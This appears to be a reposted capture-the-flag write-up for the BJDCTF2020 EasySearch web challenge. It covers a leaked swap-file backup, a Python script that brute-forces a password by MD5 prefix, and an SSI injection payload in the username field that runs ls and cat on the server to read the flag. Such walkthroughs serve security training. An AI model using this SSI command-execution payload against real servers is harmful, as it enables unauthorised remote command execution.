BUU-WEB-[BJDCTF2020]EasySearch

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[BJDCTF2020]EasySearch相关的知识,希望对你有一定的参考价值。

[BJDCTF2020]EasySearch


扫描找到主页的备份源码。

index.php.swp

在这里插入图片描述
1.passwd的md5前6位是6d0bc1
2. 成功提交后生成一个shtml文件。(SSI远程命令执行)
爆破一下,看看有哪些md5的前六位符合。

import hashlib

a = "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if((md5[0:6])=='6d0bc1'):
                                print(b)

在这里插入图片描述
爆破出密码后就可以登录了,username随意没有要求,只有密码有要求。
在这里插入图片描述

上传成功后,发现创建了一个.shtml的文件,转到文件下。
在这里插入图片描述
利用SSI注入漏洞,我们可以在username变量中传入SSI语句来远程执行系统命令。

#SSI命令格式
<!--#exec cmd="命令"-->

尝试ls一下。
在这里插入图片描述
在这里插入图片描述
没找打flag文件,再ls一下上级目录。
在这里插入图片描述
在这里插入图片描述
找到目标文件,尝试使用cat打开。
在这里插入图片描述
在这里插入图片描述
成功获取flag。

以上是关于BUU-WEB-[BJDCTF2020]EasySearch的主要内容,如果未能解决你的问题,请参考以下文章

BUU-WEB-[BJDCTF2020]The mystery of ip

BUU-WEB-[BJDCTF2020]Easy MD5

bjdctf_2020_babyrop

[BJDCTF2020]ZJCTF,不过如此

BUU-WEB-[NPUCTF2020]ReadlezPHP

[BJDCTF2020]EasySearch